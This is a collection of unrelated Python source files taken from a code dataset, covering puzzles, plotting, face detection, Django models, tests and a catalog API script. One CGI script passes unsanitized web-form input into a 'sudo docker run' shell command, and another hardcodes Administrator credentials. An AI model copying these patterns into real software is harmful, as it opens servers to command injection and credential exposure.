{\n \"local\" : [ \"../../modules/system\" ],\n \"svn\" : [ \"http://svn.ohwr.org/asyncart\"]\n}\n\nfetchto = \"../../ip_cores\"\n\n","sub_path":"hdl/syn/zed_1/Manifest.py","file_name":"Manifest.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"446333434","text":"# /usr/bin/env python\r\n# --*-- coding:utf-8 --*--\r\n\"\"\"\r\n___title__ : 202.py\r\n__author__ : LongLee\r\n___date___ : 2017/3/18 14:58\r\n__Software : PyCharm\r\n\"\"\"\r\nclass Solution(object):\r\n def isHappy(self, n):\r\n \"\"\"\r\n :type n: int\r\n :rtype: bool\r\n \"\"\"\r\n p = []\r\n while True:\r\n l = [x for x in str(n)]\r\n n = 0\r\n for i in l:\r\n n += (int(i) ** 2)\r\n p.append(n)\r\n if n == 1:\r\n return True\r\n elif p.count(n) >= 2:\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n s = Solution()\r\n print(s.isHappy(10))\r\n\r\n","sub_path":"202.py","file_name":"202.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"317942399","text":"#!/usr/bin/python36\n\n\nimport subprocess as sp\nimport cgi\nimport os\nprint(\"content-type:text/html\")\nprint(\"\\n\")\nprint('''
python2

\n\t
username python
password python

''')\nprint('
python36

username python36
password python36
')\nprint(\"
\")\n\n\nform=cgi.FieldStorage()\ncname=form.getvalue(\"cname\")\nimgname=form.getvalue(\"imgname\")\nsp.getoutput(\"sudo docker run -dit --name {c} -p 3000:4200 {i}\".format(c=cname,i=imgname))\n#print(\"hi\")\nlist_images=sp.getoutput(\"sudo docker ps --format 'table {{.Image}}'\")\nlist_names=sp.getoutput(\"sudo docker ps --format 'table {{.Names}}'\")\nlist_status=sp.getoutput(\"sudo docker ps --format 'table {{.Status}}'\")\nlist1_images=list_images.split('\\n')\nlist1_names=list_names.split('\\n')\nlist1_status=list_status.split('\\n')\n\n#list= str(sp.getoutput(\"sudo docker ps -a --format 'table'\"))\n#flist=list.split(\"\\n\")\n\nprint(\"



\")\nprint('''\n\n\n\n\n\n''')\n#print(\"
IMAGE NAMECONTAINER NAMESTATUSSTART/STOPCONSOLE
\")\nfor i,j,k in zip(list1_images[1:],list1_names[1:],list1_status[1:]):\n\t#j=i.split()\n\tprint(\"\")\n\tprint(\"\")\n\tif 'Exited' in k:\n\t\tstr=\"\"\n\t\tprint(str)\n\telif 'Up' in k:\n\t\tstr=\"\"\n\t\tprint(str)\n\telse:\n\t\tstr=\"\"\n\t\tprint(str)\n\tif 'Up' in str:\n\t\tprint(\"\".format(j))\n\telif 'Down' in str:\n\t\tprint(\"\".format(j))\n\telse:\n\t\tprint(\"\")\n \n\tif 'Up' in str:\n\t\tsp.getoutput(\"systemctl restart shellinaboxd\")\n\t\tprint(\"\")\n\t\t\n\telse:\n\t\tprint(\"\")\nprint(\"
\")\n\tprint(i)\n\tprint(\"\"+j+\"DownUpUnknown stop startNothingGet
Get
\")\n","sub_path":"pass-list-manage.py","file_name":"pass-list-manage.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"200779114","text":"import numpy as np\nimport copy\n\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import animation\nfrom matplotlib import cm\n\ndef frange(start, stop, step):\n i = start\n while i < stop:\n yield i\n i += step\n\nclass Optimiser:\n def __init__(self, anObjectiveFunction, initial_guess = None):\n self.objective_function = anObjectiveFunction;\n self.best_solution = None;\n self.current_solution_set = [];\n self.visualisation_callback = None;\n self.verbose = False;\n self.initial_guess = initial_guess;\n self.full_name = \"Unknown optimiser\";\n self.short_name = \"Unknown optimiser\";\n\n def runIteration(self):\n raise NotImplementedError(\"Subclasses should implement this!\")\n\n def evaluate(self, aParameterSet):\n raise NotImplementedError(\"Subclasses should implement this!\")\n\n def createFigure(self):\n # Create the figure and axes\n fig = plt.figure();\n ax = fig.add_subplot(111, projection='3d');\n\n # Create the wireframe\n X = [];\n Y = [];\n Z = [];\n\n offset_x = (self.objective_function.boundary_set[1][1] - self.objective_function.boundary_set[1][0]) / 26\n\n offset_y = (self.objective_function.boundary_set[0][1] - self.objective_function.boundary_set[0][0]) / 26\n\n for y in frange(self.objective_function.boundary_set[0][0], self.objective_function.boundary_set[0][1] + offset_y, offset_y):\n #\n Temp_X = [];\n Temp_Y = [];\n Temp_Z = [];\n #\n for x in frange(self.objective_function.boundary_set[1][0], self.objective_function.boundary_set[1][1] + offset_x, offset_x):\n genes = [x, y];\n objective_value = self.evaluate(genes);\n Temp_X.append(x);\n Temp_Y.append(y);\n Temp_Z.append(objective_value);\n #\n X.append(Temp_X);\n Y.append(Temp_Y);\n Z.append(Temp_Z);\n\n self.objective_function.number_of_evaluation = 0;\n\n # Plot a basic wireframe.\n #surf = ax.plot_wireframe(np.array(X), np.array(Y), np.array(Z))\n surf = ax.plot_surface(np.array(X), np.array(Y), np.array(Z), cmap=cm.jet, alpha=0.2)\n\n # Add a color bar which maps values to colors.\n fig.colorbar(surf, shrink=0.5, aspect=5)\n\n\n # Plot the current best\n scat1 = ax.scatter([], [], [], marker='o', c='r', s=50)\n\n # Plot the current population\n scat2 = ax.scatter([], [], [], marker='o', c='g', s=30)\n\n return fig, scat1, scat2;\n\n # Print the current state in the console\n def printCurrentStates(self, anIteration):\n print(\"Iteration:\\t\", anIteration);\n print(self);\n print();\n\n def update(self, i):\n # Print the current state in the console\n if self.verbose:\n self.printCurrentStates(i);\n\n # This is not the initial population\n if i != 0:\n # Run the optimisation loop\n self.runIteration();\n\n # Print the current state in the console\n if self.verbose:\n self.printCurrentStates(i);\n\n if self.visualisation_callback != None:\n self.visualisation_callback();\n\n # Best solution in red\n if self.best_solution != None:\n xdata1, ydata1, zdata1 = [], [], [];\n xdata1.append(self.best_solution.getParameter(0));\n ydata1.append(self.best_solution.getParameter(1));\n zdata1.append(self.best_solution.getObjective());\n self.scat1._offsets3d = (xdata1, ydata1, zdata1)\n\n # All the current solution\n xdata2, ydata2, zdata2 = [], [], [];\n for individual in self.current_solution_set:\n xdata2.append(individual.getParameter(0));\n ydata2.append(individual.getParameter(1));\n zdata2.append(individual.getObjective());\n self.scat2._offsets3d = (xdata2, ydata2, zdata2)\n\n def getBestSolution(self):\n param = copy.deepcopy(self.best_solution.parameter_set);\n objective = self.best_solution.getObjective();\n\n if self.objective_function.flag != self.best_solution.flag:\n objective *= -1;\n \n return param, objective;\n\n def plotAnimation(self, aNumberOfIterations, aCallback = None, aFileName = \"\"):\n\n self.visualisation_callback = aCallback;\n\n if len(self.objective_function.boundary_set) == 2:\n # Create a figure (Matplotlib)\n fig, self.scat1, self.scat2 = self.createFigure();\n\n if self.objective_function.name != \"\":\n title = self.objective_function.name + \"\\n\" + self.full_name;\n else:\n title = self.full_name;\n\n plt.title(title);\n\n # Run the visualisation\n numframes = aNumberOfIterations + 1;\n ani = animation.FuncAnimation(fig, self.update, frames=range(numframes), repeat=False);\n\n # Set up formatting for the movie files\n if aFileName != \"\":\n Writer = animation.writers['imagemagick']\n writer = Writer(fps=15, metadata=dict(artist='Me'), bitrate=1800)\n ani.save(aFileName, writer=writer)\n else:\n plt.show();\n else:\n raise NotImplementedError(\"Visualisation for \" + str(len(self.objective_function.boundary_set)) + \"-D problems is not implemented\")\n\n def __repr__(self):\n value = \"\"\n\n for ind in self.current_solution_set:\n value += ind.__repr__();\n value += '\\n';\n\n return value;\n","sub_path":"src/Optimiser.py","file_name":"Optimiser.py","file_ext":"py","file_size_in_byte":5766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"389811317","text":"import itertools\nimport sys\nsys.stdin = open('최대 상금_input.txt')\nT = int(input())\nfor tc in range(T):\n P, N = map(str, input().split())\n N = int(N)\n arr = [i for i in range(len(P))]\n p = list(itertools.permutations(arr, 2))\n M = [[] for _ in range(N+1)]\n M[0].append(P)\n for i in range(N):\n for j in range(len(M[i])):\n x = list(M[i][j])\n for k in p:\n x[k[0]], x[k[1]] = x[k[1]], x[k[0]]\n if ''.join(x) not in M[i+1]:\n M[i+1].append(''.join(x))\n x[k[0]], x[k[1]] = x[k[1]], x[k[0]]\n\n ans = 0\n for i in M[N]:\n if ans < int(i):\n ans = int(i)\n print('#{} {}'.format(tc+1, ans))","sub_path":"25/최대 상금2.py","file_name":"최대 상금2.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"419070228","text":"import cv2 \r\ncasc_path = \"C:\\\\ProgramData\\\\Anaconda3\\\\pkgs\\\\opencv3-3.1.0-py27_0\\\\Library\\etc\\\\haarcascades\\\\haarcascade_frontalface_default.xml\"\r\nfaceCascade = cv2.CascadeClassifier(casc_path)\r\nimage = cv2.imread(\"media\\\\person8.jpg\")\r\nfaces = faceCascade.detectMultiScale(image, scaleFactor=1.1, minNeighbors=5, minSize=(30,30), flags = cv2.CASCADE_SCALE_IMAGE)\r\n#image.shape[0]:获取图片高度,image.shape[1]:获取图片宽度\r\ncv2.rectangle(image, (10,image.shape[0]-20), (110,image.shape[0]), (0,0,0), -1)\r\ncv2.putText(image,\"Find \" + str(len(faces)) + \" face!\", (10,image.shape[0]-5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 2)\r\nfor (x,y,w,h) in faces:\r\n cv2.rectangle(image,(x,y),(x+w, y+h),(128,255,0),2)\r\ncv2.namedWindow(\"facedetect\")\r\ncv2.imshow(\"facedetect\", image)\r\ncv2.waitKey(0) \r\ncv2.destroyWindow(\"facedetect\")\r\n","sub_path":"python_sample_code/ch10/detectFace8.py","file_name":"detectFace8.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"311837235","text":"import earth_system.altimetry.filtering as filtering\nfrom unittest import mock\nimport pytest\nimport pandas\n\nraw_df = {\n 'iflags': [129, 8, 66, 129],\n 'oflags': [0, 24, 0, 64],\n }\nraw_df['niflags'] = [128, 8, 66, 129]\ndataframe = pandas.DataFrame(raw_df)\n\n\ndef compare_with_list(series, list_):\n comparison = [_1 == _2 for _1, _2 in zip(series, list_)]\n return comparison\n\n\ndef test_flags_set():\n flags = [\n filtering.IFlags.rain_or_ice,\n filtering.IFlags.agc_signal_to_noise_ratio,\n filtering.OFlags.maneuver,\n ]\n\n # check normal\n result = filtering.flags_set(dataframe, flags, invert=False)\n assert compare_with_list(result, [True, False, True, True])\n # check inversion\n result = filtering.flags_set(dataframe, flags, invert=True)\n assert compare_with_list(result, [False, True, False, False])\n # check columns\n result = filtering.flags_set(\n dataframe,\n flags,\n invert=False,\n columns=(\"niflags\", \"oflags\"),\n )\n assert compare_with_list(result, [False, False, True, True])\n\n\ndef test_flags_set_simple():\n flag = filtering.IFlags.rain_or_ice\n\n result = filtering.flags_set(dataframe, flag, invert=False)\n assert compare_with_list(result, [False, False, True, False])\n\n\n@mock.patch.object(filtering, 'flags_set')\ndef test_select_flags(flags_set):\n dataframe = pandas.DataFrame({'a': [0, 1, 2, 3], 'b': [2, 4, 6, 8]})\n flags = []\n\n flags_set.return_value = [True, False, False, False]\n result = filtering.select_flags(dataframe, flags, invert=False)\n # check that the result is what was expected\n assert (result.get_values().flatten() == [0, 2]).all()\n\n\ndef test_select_sigma():\n dataframe = pandas.DataFrame({\n 'values': [0, 1, 2, 3],\n 'stdalt': [1, 4, 0.5, -2],\n })\n\n result = filtering.select_sigma(\n dataframe,\n greater_than=1,\n )\n\n columns = [\"values\", \"stdalt\"]\n\n comparison = result[columns].get_values().flatten() == [1, 4, 3, -2]\n assert comparison.all()\n\n\ndef test_select_sigma_range():\n dataframe = pandas.DataFrame({\n 'values': [0, 1, 6, 3, 4, 10, 15, 20],\n 'stdalt': [1, 4, 0.5, -2, 5, 0.1, -3, -0.62],\n })\n\n result = filtering.select_sigma(\n dataframe,\n less_than=15,\n greater_than=3,\n column=\"values\",\n )\n\n columns = [\"values\", \"stdalt\"]\n assert (\n result[columns].get_values().flatten() == [6, 0.5, 4, 5, 10, 0.1]\n ).all()\n\n\ndef test_select_sigma_invalid_usage():\n dataframe = []\n exception_message = \"one of greater_than or less_than has to be set\"\n with pytest.raises(TypeError) as error:\n filtering.select_sigma(dataframe)\n assert str(error.value) == exception_message\n\n\n@mock.patch('earth_system.altimetry.filtering.select_sigma')\n@mock.patch('earth_system.altimetry.filtering.select_flags')\ndef test_select(select_flags, select_sigma):\n dataframe = [\n \"filter by flags 1\",\n \"filter by sigma 1\",\n \"valid 1\",\n \"filter by sigma 2\",\n \"filter by sigma 3\",\n \"valid 2\",\n \"valid 3\",\n \"filter by flags 2\",\n ]\n n_dataframes = 4\n dataframes = [dataframe] * n_dataframes\n\n flags = list(range(5))\n\n after_sigma_filter = [\n df\n for df in dataframe\n if \"sigma\" not in df\n ]\n after_flags_filter = [\n df\n for df in after_sigma_filter\n if \"flags\" not in df\n ]\n\n select_sigma.return_value = after_sigma_filter\n select_flags.return_value = after_flags_filter\n expected_dataframes = [\n [df for df in dataframe if \"filter\" not in df]\n ] * n_dataframes\n\n sigma = 2\n filtered_dataframes = list(filtering.select(\n dataframes,\n flags=flags,\n less_than=sigma,\n ))\n assert filtered_dataframes == expected_dataframes\n assert select_sigma.call_args_list == [\n mock.call(\n dataframe,\n column=\"stdalt\",\n less_than=sigma,\n greater_than=None,\n )\n\t\t] * n_dataframes\n assert select_flags.call_args_list == [\n mock.call(\n after_sigma_filter,\n columns=[\"iflags\", \"oflags\"],\n flags=flags,\n invert=False,\n )\n ] * n_dataframes\n\n\ndef test_select_range():\n dataframe = pandas.DataFrame({\n 'value1': list(range(10, 20)),\n 'value2': list(range(85, 95)),\n })\n\n range_mapping = {\n 'value1': (11, 15),\n 'value2': (88, 93),\n }\n\n expected_dataframe = pandas.DataFrame({\n 'value1': list(range(13, 16)),\n 'value2': list(range(88, 91)),\n }, index=list(range(3, 6)))\n\n result = filtering.select_range(dataframe, range_mapping)\n assert (result == expected_dataframe).all().all()\n","sub_path":"tests/altimetry/test_filtering.py","file_name":"test_filtering.py","file_ext":"py","file_size_in_byte":4850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"449742462","text":"import unittest\n\nfrom RULEngine.Game.Player import Player\nfrom RULEngine.Game.Team import Team\nfrom RULEngine.Util.constant import PLAYER_PER_TEAM, MAX_PLAYER_ON_FIELD_PER_TEAM\nfrom RULEngine.Util.Position import Position\nfrom RULEngine.Util.Pose import Pose\nfrom RULEngine.Util.team_color_service import TeamColor\n\n\nclass TestTeam(unittest.TestCase):\n\n def setUp(self):\n self.team = Team(TeamColor.YELLOW)\n self.team_blue = Team(TeamColor.BLUE)\n self.first_player = self.team.players[0]\n self.second_player = self.team.players[1]\n self.no_player = Player(self.team, 0)\n\n def test_init(self):\n self.assertEqual(PLAYER_PER_TEAM, len(self.team.players))\n self.assertEqual(0, len(self.team.available_players))\n self.assertEqual(0, self.team.score)\n self.assertFalse(self.team.exiting_players)\n self.assertFalse(self.team.entering_players)\n self.assertEqual(TeamColor.YELLOW, self.team.team_color)\n\n def test_has_player_exists(self):\n self.assertTrue(self.team.has_player(self.first_player))\n\n def test_has_player_no_exists(self):\n self.assertFalse(self.team.has_player(self.no_player))\n\n def test_update_player(self):\n init_pose = self.first_player.pose\n self.assertEqual(init_pose, self.team.players[0].pose)\n self.team.update_player(0, [Pose(Position(500, 500))])\n self.assertNotEqual(init_pose, self.team.players[0].pose)\n self.assertEqual(self.team.players[0].pose, self.first_player.pose)\n\n def test_update_availability_players(self):\n for i in range(MAX_PLAYER_ON_FIELD_PER_TEAM):\n self.team.update_player(i, [Pose(Position(500, 500))])\n self.assertTrue(self.team.players[i] in self.team.available_players.values())\n self.team.update_player(MAX_PLAYER_ON_FIELD_PER_TEAM+1, [Pose(Position(500, 500))])\n self.assertTrue(self.team.players[MAX_PLAYER_ON_FIELD_PER_TEAM+1] in self.team.available_players.values())\n self.assertTrue(len(self.team.available_players) == MAX_PLAYER_ON_FIELD_PER_TEAM+1)\n # simulating 21 frames where we don't see the robot\n for i in range(21):\n self.team.update_player(0, [None])\n self.assertTrue(self.team.players[0] not in self.team.available_players.values())\n\n def test_invalid_id(self):\n AN_INVALID_ID = PLAYER_PER_TEAM+1\n uut = self.team.update_player\n self.assertRaises(KeyError, uut, AN_INVALID_ID, Pose())\n\n def test_is_team_yellow(self):\n self.assertTrue(self.team.is_team_yellow())\n self.assertFalse(self.team_blue.is_team_yellow())\n","sub_path":"tests/RULEngine/Game/test_team.py","file_name":"test_team.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"67974929","text":"from openpyxl import load_workbook, Workbook\nfrom Bio import SeqIO\n\nclass TargetCreator():\n def __init__(self, user_input):\n wb = load_workbook(user_input['excel_file_location'])\n self.ws = wb.active\n self.max_col = self.ws.max_column\n self.max_row = self.ws.max_row\n self.targets = []\n self.fasta_location = user_input['fasta_location']\n self.excel_reader()\n\n def excel_reader(self):\n for row in range(2, self.max_row + 1):\n target = {\n \"target\": self.ws.cell(row, 1).value,\n \"partner\": \"Xyphos\",\n \"protein_class_pk\": \"1\",\n \"notes\": self.ws.cell(row, 2).value,\n \"project_name\": \"Xolo\",\n \"subunits\": self.parse_subunits(row),\n }\n self.targets.append(target)\n \n def parse_subunits(self, row):\n subunit_array = []\n for i in range(3, self.max_col + 1, 2):\n subunit_name = self.ws.cell(row, i).value \n subunit = {\n \"subunit_name\": subunit_name,\n \"copies\": \"1\",\n \"amino_acid_fasta_description\": subunit_name,\n \"amino_acid_sequence\": self.get_fasta_sequence(subunit_name, \"AA\"),\n \"genes\": self.parse_genes(subunit_name)\n }\n subunit_array.append(subunit)\n return subunit_array\n\n def parse_genes(self, subunit_name):\n gene = {}\n gene[\"dna_fasta_description\"] = subunit_name\n gene[\"dna_sequence\"] = self.get_fasta_sequence(subunit_name, \"DNA\")\n return [(gene)]\n\n def get_fasta_sequence(self, file_name, seq_type):\n errors = []\n sequence = ''\n try:\n for record in SeqIO.parse(f'{self.fasta_location}/{file_name}_{seq_type}.fasta', 'fasta'):\n sequence = str(record.seq) \n except FileNotFoundError as err:\n errors.append(f'{err}: {err.filename2}')\n if len(sequence) > 0:\n return sequence\n if (errors):\n return errors\n","sub_path":"lib/target_creator.py","file_name":"target_creator.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"613214249","text":"\n# Necessary import to be able to use Django's model library.\nfrom django.db import models\n\n# Another import, this one to allow us to sync our own UserInfo database\n# with a given user from Django's User database.\nfrom django.contrib.auth.models import User\n\n\"\"\" USER\n The user model holds all of the information pertaining to a given user,\n aside from the username and password; these are held by Django's own\n User model. Instead, this model holds all the extra information associated\n with a user, including the following:\n 1) A boolean value representing whether the user has finished the\n experiment.\n 2) Their answers to the 26 questions. Admittedly, this implementation\n is pretty clunky. Ideally we would have an easy way of storing 26 (or\n X many) decimals, but Django (and really databases in general) don't\n support lists very well. This is the approach I've taken, if you,\n future developer, see a better way to do it, by all means...\n 3) The ordering of the domains. This will just be stored as a string.\n 4) The ordering of the questions. This will also be stored as a string.\n 5) The number of questions the user has answered thus far.\n 6) The payment that the user will receive. This will only be computed\n after the user has finished the experiment.\n\"\"\"\nclass UserProfile(models.Model):\n\n # The User object that this profile corresponds to.\n user = models.OneToOneField(User)\n\n\n # Every user is going to be facing either the static or dynamic arm.\n # We control which with the user_class variable. user_class will be\n # set to either \"static\" or \"dynamic\" to indicate which class the\n # user belongs to.\n user_class = models.CharField(max_length = 7)\n\n\n # Keep track of which trial we're on. If the user is dynamic, we also need\n # to know which day they are on.\n trials_done = models.IntegerField(default = 0)\n day = models.CharField(max_length = 9, default = \"Monday\")\n\n\n # A bunch of Booleans to represent where the user is located in the\n # experiment.\n finished_training = models.BooleanField(default = False)\n finished_experiment = models.BooleanField(default = False)\n finished_diagnostics = models.BooleanField(default = False)\n\n\n # Finally, the payment.\n payment = models.DecimalField(max_digits = 6, decimal_places = 2, default = \"0.00\")\n payment_trial = models.IntegerField()\n\n\n # Return URL. This is only relevant to TESS subjects, as it holds the\n # URL that the user should return to once they have completed the survey.\n return_url = models.CharField(max_length = 150, default = \"\")\n\n\n\n\"\"\" TRIAL ANSWER\n This model will store each user's answers to each trial. Every answer\n to every trial from the experimental half of the project from every\n user that participates will be stored here. Each entry into the model has\n four components: the User that the entry belongs to, the number of the\n question that they are answering, their answer to that question, and the\n percent they were off by.\n\n FIELDS\n user The User object corresponding to who this answer belongs to. This\n is to identify who created this answer.\n question The user's question-index. If this question was the user's\n nth question, this field will be set to n.\n\n And then a crap ton of variables to hold the info about the trial at hand\n and the user's responses to it.\n \n\"\"\"\nclass TrialAnswer(models.Model):\n user = models.ForeignKey(User)\n question = models.IntegerField()\n\n # Info about the question\n incomes = models.CommaSeparatedIntegerField(max_length = 30)\n interests = models.CommaSeparatedIntegerField(max_length = 30)\n responses = models.CommaSeparatedIntegerField(max_length = 30)\n\n\n \"\"\" Whenever the user submits a response we need to add it to the\n trial object. The way in which this is done differs for dynamic\n and static users. If the user is static, we just set self.responses\n equal to response; if the user is dynamic, however, we need to add\n to self.responses rather than reset it.\n \"\"\"\n def add_response(self, user, response):\n\n # When we get the responses, they're in a list form.\n response = ','.join(response)\n \n if user.get_profile().user_class == \"static\":\n self.responses = response\n else:\n if self.responses:\n self.responses += \",\" + response\n else:\n self.responses = response\n self.save()\n\n\n \"\"\" We need to check that the user's responses are legal. That is, are their\n responses OK for the given trial, given that trial's incomes and interests?\n If they are, then we just return the responses exactly as given, adding. If they're\n not, we change the later responses so that they are legal.\n \"\"\"\n def validate(self):\n\n # Couple of initial variables. carry_over represents how much money\n # we have carried from the previous day.\n carry_over = 0.\n index = 0\n\n # Convert all the incomes, interests and responses from Django's unicode\n # to floats. It will be helpful to divide everything in interests by 100\n # to change the values from percents to decimal figures.\n incomes = map(float, self.incomes.split(','))\n interests = map(lambda x: float(x) / 100., self.interests.split(','))\n responses = map(float, self.responses.split(','))\n \n for response in responses:\n\n # The first thing we do for every day of the week is find out\n # how much money we could possibly have to spend. This is calculated\n # as the amount of money carried over from the previous day, plus\n # today's income, plus money that we could borrow.\n today_money = carry_over + incomes[index]\n borrowable = float(incomes[-1])\n for day in reversed(range(index, len(interests))):\n borrowable = borrowable / (1 + interests[day]) + (incomes[day] if day != index else 0)\n\n # The amount of cash we can spend today is how much we have physically\n # plus how much we can borrow\n spendable = today_money + borrowable\n\n # If the amount we want to spend is less than what we can spend, then\n # allow it. Otherwise, the amount we get to spend is restricted to\n # to what we can spend.\n if response > spendable:\n responses[index] = round(spendable, 2)\n carry_over = (today_money - responses[index]) * (1 + interests[index])\n index += 1\n\n # Lastly, give the user whatever's left over to spend on the last day.\n # Convert into CommaSeparatedInteger form\n responses.append(round(carry_over + incomes[-1], 2))\n responses = ','.join(map(str, responses))\n\n # Save that shit.\n self.responses = responses\n self.save()\n\n\n\n\"\"\" The responses that a dynamic user has for the diagnostic questions.\n\"\"\"\nclass DiagnosticAnswer(models.Model):\n\n # The user.\n user = models.OneToOneField(User)\n\n # The questions\n question_1 = models.DecimalField(max_digits = 5, decimal_places = 2)\n question_2 = models.DecimalField(max_digits = 5, decimal_places = 2)\n question_3 = models.DecimalField(max_digits = 5, decimal_places = 2)\n question_4 = models.DecimalField(max_digits = 5, decimal_places = 2)\n\n\n\n","sub_path":"experiment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"559316159","text":"\n\nfrom xai.brain.wordbase.nouns._prong import _PRONG\n\n#calss header\nclass _PRONGS(_PRONG, ):\n\tdef __init__(self,): \n\t\t_PRONG.__init__(self)\n\t\tself.name = \"PRONGS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"prong\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_prongs.py","file_name":"_prongs.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"534182658","text":"'''\nCreated on Jul 16, 2018\n\n@author: dwrigley\n\nget a list of all custom attributes in EDC - returning the Name and Id\nthe id would be used for any search/custom import activiies\noutput printed to the console\n'''\n\nimport requests\nfrom requests.auth import HTTPBasicAuth\nimport time\n\nstart_time = time.time()\n\n# ******************************************************\n# change these settings for your catalog service\n# ******************************************************\n# set variables for connecting to the catalog\n# and running a query to get a result-set\n# the processItem function will be called for each item\n# ******************************************************\ncatalogServer = 'http://napslxapp01:9085'\nuid = 'Administrator'\npwd = 'Administrator'\n# pwd=uid;\npageSize = 500 # number of objects for each page/chunk\n# ******************************************************\n# end of parameters that should be changed\n# ******************************************************\nresturl = catalogServer + '/access/2/catalog/models/attributes'\nheader = {\"Accept\": \"application/json\"} \n\n\n# main function\ndef main():\n \"\"\"\n call GET /access/2/catalog/models/attributes\n and GET /access/2/catalog/models/referenceAttributes\n the /access/2/catalog/models/attributes ca;ll returns all attributes\n (system + custom), so we filter for only the custom attrs\n these start with \"com.infa.appmodels.ldm.\n\n output - prints the atrribute name, id and some other properties to console\n \"\"\"\n global resturl\n\n total = 1000 # initial value - set to > 0 - replaced after first call\n offset = 0\n page = 0\n \n print(\"url=\" + resturl)\n print(\"user=\" + uid)\n print(\"\")\n print(header)\n \n attrCount = 0\n custAttrCount = 0\n \n while offset < total:\n page += 1\n parameters = {'offset': offset, 'pageSize': pageSize}\n\n # execute catalog rest call, for a page of results\n resp = requests.get(resturl, params=parameters, headers=header,\n auth=HTTPBasicAuth(uid, pwd))\n status = resp.status_code\n if status != 200:\n # some error - e.g. catalog not running, or bad credentials\n print(\"error! \" + str(status) + str(resp.json()))\n break\n \n resultJson = resp.json()\n total = resultJson['metadata']['totalCount']\n #print(\"objects found: \" + str(total) + \" processing:\" + str(offset+1) \n # + \"-\" + str(offset+pageSize) + \" pagesize=\"\n # + str(pageSize) + \" currentPage=\" + str(page) \n # );\n\n # for next iteration\n offset += pageSize\n \n # for each attribute found...\n for attrDef in resultJson[\"items\"]:\n attrCount += 1\n attrId = attrDef[\"id\"]\n attrName = attrDef[\"name\"]\n dataType = attrDef[\"dataTypeId\"]\n sortable = attrDef[\"sortable\"]\n facetable = attrDef[\"facetable\"]\n if attrId.startswith(\"com.infa.appmodels.ldm.\"):\n custAttrCount += 1\n print(\"Name: \" + attrName + \" id=\" + attrId + \" type=\" +\n dataType + \" sortable=\" + str(sortable) +\n \" facetable=\" + str(facetable)) \n \n # end of while loop\n\n # note /access/2/catalog/models/attributes does not return classifications\n total = 1000 # initial value - set to > 0 - will be over-written by the count of objects returned\n offset = 0\n page = 0\n classificationCount = 0\n\n print(\"\")\n print(\"reference attributes:\")\n\n resturl = catalogServer + '/access/2/catalog/models/referenceAttributes'\n while offset < total:\n page += 1\n parameters = {'offset': offset, 'pageSize': pageSize}\n\n # execute catalog rest call, for a page of results\n resp = requests.get(resturl, params=parameters, headers=header,\n auth=HTTPBasicAuth(uid, pwd))\n status = resp.status_code\n if status != 200:\n # some error - e.g. catalog not running, or bad credentials\n print(\"error! \" + str(status) + str(resp.json()))\n break\n \n resultJson = resp.json()\n total = resultJson['metadata']['totalCount']\n\n # for next iteration\n offset += pageSize\n \n # for each attribute found...\n for attrDef in resultJson[\"items\"]:\n classificationCount += 1\n attrId = attrDef[\"id\"]\n attrName = attrDef[\"name\"]\n dataType = attrDef[\"refDataTypeId\"]\n sortable = attrDef[\"sortable\"]\n facetable = attrDef[\"facetable\"]\n if attrId.startswith(\"com.infa.appmodels.ldm.\"):\n custAttrCount += 1\n print(\"Name: \" + attrName + \" id=\" + attrId + \" type=\" +\n dataType + \" sortable=\" + str(sortable) +\n \" facetable=\" + str(facetable)) \n\n print(\"\")\n print(\"Finished - run time = %s seconds ---\" % (time.time() - start_time))\n print(\"total attributes=\" + str(attrCount))\n print(\"custom attributes=\" + str(custAttrCount))\n print(\"classifification attributes=\" + str(classificationCount))\n \n\n# call main - if not already called or used by another script\nif __name__ == \"__main__\":\n main() \n\n","sub_path":"python/listCustomAttributes.py","file_name":"listCustomAttributes.py","file_ext":"py","file_size_in_byte":5378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"77020127","text":"from sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import exists\nfrom random import randrange\n\nfrom tabledef import engine, Categories, Foods, MyFoods\n\nfrom filldb import *\n\n\ndef showStartMenu():\n \"\"\"display the start menu\"\"\"\n print(\"\\n1: Replace a food\")\n print(\"2: Show the saved foods\")\n print(\"0: Quit\\n\")\n\n\ndef getStartMenuChoice():\n \"\"\"take the user start menu choice\"\"\"\n choice = None\n ok = False\n while(not ok):\n try:\n choice = int(input(\"Enter your choice :\"))\n except ValueError:\n print(\"The number entered is wrong...\")\n\n if (choice in (1, 2, 0)):\n ok = True\n else:\n print(\"The choice must be a number within 1, 2 or 0\")\n ok = False\n return choice\n\n\n#section show registre\ndef showSavedFoodsMenu():\n print(\"\\n1: Show the simple list (foods names)\")\n print(\"2: Show the detailled list (all foods informations)\")\n print(\"0: 